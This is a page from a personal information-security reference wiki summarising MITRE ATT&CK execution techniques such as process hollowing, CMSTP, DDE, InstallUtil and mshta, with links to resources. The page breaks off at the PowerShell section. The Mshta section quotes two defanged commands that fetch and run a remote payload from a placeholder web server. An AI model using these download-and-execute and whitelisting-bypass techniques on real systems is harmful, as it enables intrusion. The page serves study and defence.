<!DOCTYPE html>
<!--[if lt IE 7]>       <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>          <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>          <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!-->  <html class="no-js" lang="en"> <!--<![endif]-->
<head>
    <title>Execution - Information Security Reference</title>
    <meta name="description" content="My Stylish Documentation" />
    <meta name="author" content="I, Me & Myself">
    <meta charset="UTF-8">
    <link rel="icon" href="../../themes/daux/img/favicon-blue.png" type="image/x-icon">
    <!-- Mobile -->
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Font -->
    <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700&subset=latin,cyrillic-ext,cyrillic' rel='stylesheet' type='text/css'>
    <!-- CSS -->
    <link href='../../themes/daux/css/theme-blue.min.css' rel='stylesheet' type='text/css'>
            <!-- Tipue Search -->
        <link href="../../tipuesearch/tipuesearch.css" rel="stylesheet">
    
    <!--[if lt IE 9]>
    <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
</head>
<body class="">
    
<header class="Navbar hidden-print">
    <a class="Navbar__brand" href="../../index.html">Information Security Reference</a>

    <div class="Search">
        <svg class="Search__icon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 451 451"><path d="M447.05 428l-109.6-109.6c29.4-33.8 47.2-77.9 47.2-126.1C384.65 86.2 298.35 0 192.35 0 86.25 0 .05 86.3.05 192.3s86.3 192.3 192.3 192.3c48.2 0 92.3-17.8 126.1-47.2L428.05 447c2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4c5.2-5.2 5.2-13.8 0-19zM26.95 192.3c0-91.2 74.2-165.3 165.3-165.3 91.2 0 165.3 74.2 165.3 165.3s-74.1 165.4-165.3 165.4c-91.1 0-165.3-74.2-165.3-165.4z"/></svg>
        <input type="search" id="tipue_search_input" class="Search__field" placeholder="Search..." autocomplete="on" results=25 autosave=text_search>
    </div>
</header>
<div class="Columns content">
    <aside class="Columns__left Collapsible">
        <div class="Collapsible__container">
            <button type="button" class="Button Collapsible__trigger">
                <span class="Collapsible__trigger--bar"></span>
                <span class="Collapsible__trigger--bar"></span>
                <span class="Collapsible__trigger--bar"></span>
            </button>
        </div>

        <div class="Collapsible__content">
            <!-- Navigation -->
            <ul class='Nav'><li class='Nav__item '><a href="../../Active_Directory.html">Active Directory</a></li><li class='Nav__item '><a href="../../AnonOpSecPrivacy.html">AnonOpSecPrivacy</a></li><li class='Nav__item '><a href="../../Archiving.html">Archiving</a></li><li class='Nav__item Nav__item--open has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>ATT&CK-Stuff</a><ul class='Nav'><li class='Nav__item Nav__item--open has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>ATT&CK</a><ul class='Nav'><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Collection.html">Collection</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Command_and_Control.html">Command and Control</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Credential_Access.html">Credential Access</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Defense_Evasion.html">Defense Evasion</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Discovery.html">Discovery</a></li><li class='Nav__item Nav__item--active'><a href="../../ATT&CK-Stuff/ATT&CK/Execution.html">Execution</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Exfiltration.html">Exfiltration</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Initial_Access.html">Initial Access</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Lateral Movement.html">Lateral Movement</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Persistence.html">Persistence</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/ATT&CK/Privilege_Escalation.html">Privilege Escalation</a></li></ul></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Pre-ATT&CK</a><ul class='Nav'><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/# Establish & Maintain Infrastructure.html"># Establish & Maintain Infrastructure</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Adversary_OPSEC.html">Adversary OPSEC</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Build_Capabilities.html">Build Capabilities</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Organizationa_ Information_Gathering.html">Organizationa  Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Organizational_Weakness.html">Organizational Weakness</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/People_Information_Gathering.html">People Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/People_Weakness_Identification.html">People Weakness Identification</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Persona_Development.html">Persona Development</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Priority_Definition _lanning.html">Priority Definition  lanning</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Priority_Definition_Directive.html">Priority Definition Directive</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Stage_Capabilities.html">Stage Capabilities</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Target_Selection.html">Target Selection</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Technical_Information_Gathering.html">Technical Information Gathering</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Technical_Weakness_Identification.html">Technical Weakness Identification</a></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/Pre-ATT&CK/Test_Capabilities.html">Test Capabilities</a></li></ul></li><li class='Nav__item '><a href="../../ATT&CK-Stuff/README.html">README</a></li></ul></li><li class='Nav__item '><a href="../../Basic.html">Basic</a></li><li class='Nav__item '><a href="../../bios_uefi.html">bios uefi</a></li><li class='Nav__item '><a href="../../Building_A_Lab.html">Building A Lab</a></li><li class='Nav__item '><a href="../../CandE.html">CandE</a></li><li class='Nav__item '><a href="../../Career.html">Career</a></li><li class='Nav__item '><a href="../../Cars.html">Cars</a></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Cheat sheets reference pages Checklists -</a><ul class='Nav'><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/list_of_emoji.html">list of emoji</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/metasploit.html">metasploit</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.html">Nmap Cheat Sheet</a></li><li class='Nav__item '><a href="../../Cheat sheets reference pages Checklists -/Radare2.html">Radare2</a></li></ul></li><li class='Nav__item '><a href="../../Cheats.html">Cheats</a></li><li class='Nav__item '><a href="../../Cloud.html">Cloud</a></li><li class='Nav__item '><a href="../../Conferences.html">Conferences</a></li><li class='Nav__item '><a href="../../Containers.html">Containers</a></li><li class='Nav__item '><a href="../../Courses_Training.html">Courses Training</a></li><li class='Nav__item '><a href="../../Crypto_Encrypt.html">Crypto Encrypt</a></li><li class='Nav__item '><a href="../../CTFs_Wargames.html">CTFs Wargames</a></li><li class='Nav__item '><a href="../../Darknets.html">Darknets</a></li><li class='Nav__item '><a href="../../DataVis.html">DataVis</a></li><li class='Nav__item '><a href="../../Defense.html">Defense</a></li><li class='Nav__item '><a href="../../DFIR.html">DFIR</a></li><li class='Nav__item '><a href="../../Docs_and_Reports.html">Docs and Reports</a></li><li class='Nav__item '><a href="../../Embedded.html">Embedded</a></li><li class='Nav__item '><a href="../../Exfiltration.html">Exfiltration</a></li><li class='Nav__item '><a href="../../Exploit_Dev.html">Exploit Dev</a></li><li class='Nav__item '><a href="../../Fuzzing.html">Fuzzing</a></li><li class='Nav__item '><a href="../../Games.html">Games</a></li><li class='Nav__item '><a href="../../help.html">help</a></li><li class='Nav__item '><a href="../../honeypot.html">honeypot</a></li><li class='Nav__item '><a href="../../Interesting_Things.html">Interesting Things</a></li><li class='Nav__item '><a href="../../L-SM-TH.html">L-SM-TH</a></li><li class='Nav__item '><a href="../../Malware.html">Malware</a></li><li class='Nav__item '><a href="../../Network_Attacks.html">Network Attacks</a></li><li class='Nav__item '><a href="../../Osint.html">Osint</a></li><li class='Nav__item '><a href="../../Passwords.html">Passwords</a></li><li class='Nav__item '><a href="../../Phishing.html">Phishing</a></li><li class='Nav__item '><a href="../../Physical_Security.html">Physical Security</a></li><li class='Nav__item '><a href="../../Policy_Compliance.html">Policy Compliance</a></li><li class='Nav__item '><a href="../../Port_List.html">Port List</a></li><li class='Nav__item '><a href="../../PrivescPostEx.html">PrivescPostEx</a></li><li class='Nav__item '><a href="../../Programming_Language_Security.html">Programming Language Security</a></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Rants&Writeups</a><ul class='Nav'><li class='Nav__item '><a href="../../Rants&Writeups/Bitcoin_Hack.html">Bitcoin Hack</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Hacking Team Writeup.html">Hacking Team Writeup</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Opsec_rant-alpraking.html">Opsec rant-alpraking</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Opsec_rant2-nachash.html">Opsec rant2-nachash</a></li><li class='Nav__item  has-children'><a href="#" class="aj-nav folder"><i class="Nav__arrow">&nbsp;</i>Writeups</a><ul class='Nav'><li class='Nav__item '><a href="../../Rants&Writeups/Writeups/Empire_and_Metasploit_101.html">Empire and Metasploit 101</a></li><li class='Nav__item '><a href="../../Rants&Writeups/Writeups/Lab_for_exploit_dev-basic.html">Lab for exploit dev-basic</a></li></ul></li></ul></li><li class='Nav__item '><a href="../../RE.html">RE</a></li><li class='Nav__item '><a href="../../Reverse Engineering - REMath Literature.html">Reverse Engineering - REMath Literature</a></li><li class='Nav__item '><a href="../../Rootkits.html">Rootkits</a></li><li class='Nav__item '><a href="../../RT.html">RT</a></li><li class='Nav__item '><a href="../../SCA.html">SCA</a></li><li class='Nav__item '><a href="../../SCADA.html">SCADA</a></li><li class='Nav__item '><a href="../../SE.html">SE</a></li><li class='Nav__item '><a href="../../sysinternals.html">sysinternals</a></li><li class='Nav__item '><a href="../../threatmodel.html">threatmodel</a></li><li class='Nav__item '><a href="../../UX.html">UX</a></li><li class='Nav__item '><a href="../../Web.html">Web</a></li><li class='Nav__item '><a href="../../Wireless.html">Wireless</a></li></ul>

            <div class="Links">
                
                                    <div class="CodeToggler">
                        <hr/>
                                                    <a class="CodeToggler__button CodeToggler__button--main" href="#">Show Code Blocks Inline</a><br>
                                            </div>
                
                            </div>
        </div>
    </aside>
    <div class="Columns__right ">
        <div class="Columns__right__content">
            <div class="doc_content">
                <article class="Page">

    <div class="Page__header">
        <h1><a href="../../ATT&CK-Stuff/README.html">ATT&CK-Stuff</a> <svg class="Page__header--separator" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 477.175 477.175"><path d="M360.73 229.075l-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4 3.4 0 6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8.1-19z"/></svg> <a href="../../ATT&CK-Stuff/ATT&CK/Collection.html">ATT&CK</a> <svg class="Page__header--separator" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 477.175 477.175"><path d="M360.73 229.075l-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4 3.4 0 6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8.1-19z"/></svg> <a href="../../ATT&CK-Stuff/ATT&CK/Execution.html">Execution</a></h1>
                    </div>


    <div class="s-content">
        <h1 id="page_Execution">Execution</h1>
<p><a href="https://attack.mitre.org/wiki/execution" class="external">MITRE ATT&amp;CK - Execution</a></p>
<ul>
<li>
<p>The execution tactic represents techniques that result in execution of adversary-controlled code on a local or remote system. This tactic is often used in conjunction with lateral movement to expand access to remote systems on a network.</p>
</li>
<li>
<p><a href="https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" class="external">Windows oneliners to download remote payload and execute arbitrary code - arno0x0x</a></p>
</li>
<li>
<p><a href="https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb" class="external">Arbitrary, Unsigned Code Execution Vector in Microsoft.Workflow.Compiler.exe - Matt Graeber</a></p>
</li>
<li>
<p><a href="https://www.fortynorthsecurity.com/port-microsoft-workflow-compiler-exe-loader-to-veil/" class="external">How to Port Microsoft.Workflow.Compiler.exe Loader to Veil - FortyNorthSecurity</a></p>
</li>
<li>
<p><a href="https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75" class="external">MSXSL.EXE AND WMIC.EXE — A Way to Proxy Code Execution - TH Team</a></p>
</li>
</ul>
<hr />
<h2 id="page_Process+Hollowing">Process Hollowing</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1093" class="external">Process Hollowing - ATT&amp;CK</a>
<ul>
<li>Process hollowing occurs when a process is created in a suspended state and the process's memory is replaced with the code of a second program so that the second program runs instead of the original program. Windows and process monitoring tools believe the original process is running, whereas the actual program running is different. Hollowing Process hollowing may be used similarly to DLL Injection to evade defenses and detection analysis of malicious process execution by launching adversary-controlled code under the context of a legitimate process.</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="http://www.autosectools.com/process-hollowing.pdf" class="external">Process Hollowing - John Leitch - PDF</a>
</li>
<li>
<a href="https://github.com/m0n0ph1/Process-Hollowing" class="external">Process-Hollowing</a>
<ul>
<li>Great explanation of Process Hollowing</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_AppleScript">AppleScript</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1155" class="external">AppleScript - ATT&amp;CK</a>
<ul>
<li>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program.</li>
<li>AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.</li>
<li>Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python Macro Malware Targets Macs. Scripts can be run from the command lie via <code>osascript /path/to/script</code> or <code>osascript -e &quot;script here&quot;</code>.</li>
</ul>
</li>
</ul>
<h4 id="page_OS+X">OS X</h4>
<ul>
<li>
<a href="https://ss64.com/osx/osascript.html" class="external">osascript - SS64</a>
</li>
<li>
<a href="https://en.wikipedia.org/wiki/AppleScript" class="external">AppleScript - Wikipedia</a>
</li>
<li>
<a href="https://developer.apple.com/library/content/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html" class="external">Introduction to AppleScript Language Guide - developer.apple</a>
</li>
<li>
<a href="https://developer.apple.com/library/content/releasenotes/InterapplicationCommunication/RN-JavaScriptForAutomation/Articles/OSX10-10.html" class="external">Javascript for Automation - Release Notes 10.10 - dev.apple</a>
</li>
</ul>
<hr />
<h2 id="page_CMSTP">CMSTP</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1191" class="external">CMSTP - ATT&amp;CK</a>
<ul>
<li>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.</li>
<li>Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.</li>
<li>CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Command-Line+Interface">Command-Line Interface</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1059" class="external">Command-Line Interface - ATT&amp;CK</a>
<ul>
<li>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms.Wikipedia Command-Line Interface One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<ul>
<li>
<a href="http://linuxcommand.org/lc3_learning_the_shell.php" class="external">Linuxcommand.org</a>
</li>
<li>
<a href="https://ryanstutorials.net/linuxtutorial/" class="external">Learn the Bash Command Line</a>
</li>
</ul>
<h4 id="page_OS+X">OS X</h4>
<h4 id="page_Windows">Windows</h4>
<hr />
<h2 id="page_Control+Panel+Items">Control Panel Items</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1196" class="external">Control Panel Items - ATT&amp;CK</a>
<ul>
<li>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.</li>
<li>For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.</li>
<li>Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Dynamic+Data+Exchange">Dynamic Data Exchange</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1173" class="external">Dynamic Data Exchange - ATT&amp;CK</a>
<ul>
<li>Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.</li>
<li>Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123</li>
<li>Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Execution+through+API">Execution through API</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1106" class="external">Execution through API - ATT&amp;CK</a>
<ul>
<li>Adversary tools may directly use the Windows application programming interface (API) to execute binaries.</li>
</ul>
</li>
</ul>
<h4 id="page_Linux">Linux</h4>
<h4 id="page_OS+X">OS X</h4>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1106" class="external">Execution through API - ATT&amp;CK</a>
<ul>
<li>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.</li>
<li>Additional Windows API calls that can be used to execute binaries include:
<ul>
<li>CreateProcessA() and CreateProcessW(),</li>
<li>CreateProcessAsUserA() and CreateProcessAsUserW(),</li>
<li>CreateProcessInternalA() and CreateProcessInternalW(),</li>
<li>CreateProcessWithLogonW(), CreateProcessWithTokenW(),</li>
<li>LoadLibraryA() and LoadLibraryW(),</li>
<li>LoadLibraryExA() and LoadLibraryExW(),</li>
<li>LoadModule(),</li>
<li>LoadPackagedLibrary(),</li>
<li>WinExec(),</li>
<li>ShellExecuteA() and ShellExecuteW(),</li>
<li>ShellExecuteExA() and ShellExecuteExW()</li>
</ul>
</li>
</ul>
</li>
<li>
<a href="https://skanthak.homepage.t-online.de/verifier.html" class="external">Application Verifier Provider</a>
</li>
<li>
<a href="https://msdn.microsoft.com/en-us/library/ms682425" class="external">CreateProcess function - msdn</a>
</li>
</ul>
<hr />
<h2 id="page_Execution+through+Module+Load">Execution through Module Load</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1129" class="external">Execution through Module Load - ATT&amp;CK</a>
<ul>
<li>The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API.1</li>
<li>The module loader can load DLLs:
<ul>
<li>via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;</li>
<li>via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);</li>
<li>via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;</li>
<li>via <code>&lt;file name=&quot;filename.extension&quot; loadFrom=&quot;fully-qualified or relative pathname&quot;&gt;</code> in an embedded or external &quot;application manifest&quot;. The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.</li>
</ul>
</li>
<li>Adversaries can use this functionality as a way to execute arbitrary code on a system.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Exploitation+for+Client+Execution">Exploitation for Client Execution</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1203" class="external">Exploitation for Client Execution - ATT&amp;CK</a>
<ul>
<li>Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.</li>
<li>
<strong>Browser-based Exploitation</strong>
<ul>
<li>Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.</li>
</ul>
</li>
<li>
<strong>Office Applications</strong>
<ul>
<li>Common office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.</li>
</ul>
</li>
<li>
<strong>Common Third-party Applications</strong>
<ul>
<li>Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Graphical+User+Interface">Graphical User Interface</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1061" class="external">Graphical User Interface - ATT&amp;CK</a>
<ul>
<li>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_InstallUtil">InstallUtil</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1118" class="external">InstallUtil - ATT&amp;CK</a>
<ul>
<li>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is located in the .NET directory on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft. Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].</li>
</ul>
</li>
</ul>
<h4 id="page_Windows">Windows</h4>
<ul>
<li>
<a href="https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool" class="external">Installutil.exe (Installer Tool) - MSDN</a>
</li>
<li>
<a href="https://github.com/subTee/AllTheThings" class="external">AllTheThings</a>
<ul>
<li>Includes 5 Known Application Whitelisting/ Application Control Bypass Techniques in One File. (First one is InstallUtil)</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_LSASS+Driver">LSASS Driver</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1177" class="external">LSASS Driver - ATT&amp;CK</a>
<ul>
<li>The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.</li>
<li>Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Launchctl">Launchctl</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1152" class="external">Launchctl - ATT&amp;CK</a>
<ul>
<li>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made Sofacy Komplex Trojan. Running a command from launchctl is as simple as <code>launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute &quot;arg&quot; &quot;arg&quot; &quot;arg&quot;</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Local+Job+Scheduling">Local Job Scheduling</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1168" class="external">Local Job Scheduling - ATT&amp;CK</a>
<ul>
<li>On Linux and Apple systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, at, and launchd.3 Unlike 	Scheduled Task on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).</li>
<li>
<strong>cron</strong>
<ul>
<li>System-wide cron jobs are installed by modifying <code>/etc/crontab</code> file, <code>/etc/cron.d/</code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files.3 This works on Mac and Linux systems.</li>
<li>Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.</li>
</ul>
</li>
<li>
<strong>at</strong>
<ul>
<li>The at program is another means on Linux-based systems, including Mac, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.</li>
</ul>
</li>
<li>
<strong>launchd</strong>
<ul>
<li>Each launchd job is described by a different configuration property list (plist) file similar to Launch Daemon or Launch Agent, except there is an additional key called StartCalendarInterval with a dictionary of time values. This only works on macOS and OS X.</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Mshta">Mshta</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1170" class="external">Mshta - ATT&amp;CK</a>
<ul>
<li>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.</li>
<li>Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567</li>
<li>Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:https[:]//webserver/payload[.]sct&quot;&quot;)&quot;))</code>
</li>
<li>They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>
</li>
<li>Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.</li>
</ul>
</li>
</ul>
<hr />
<h2 id="page_Powershell">Powershell</h2>
<ul>
<li>
<a href="https://attack.mitre.org/wiki/Technique/T1086" class="external">PowerShell</a>
<ul>
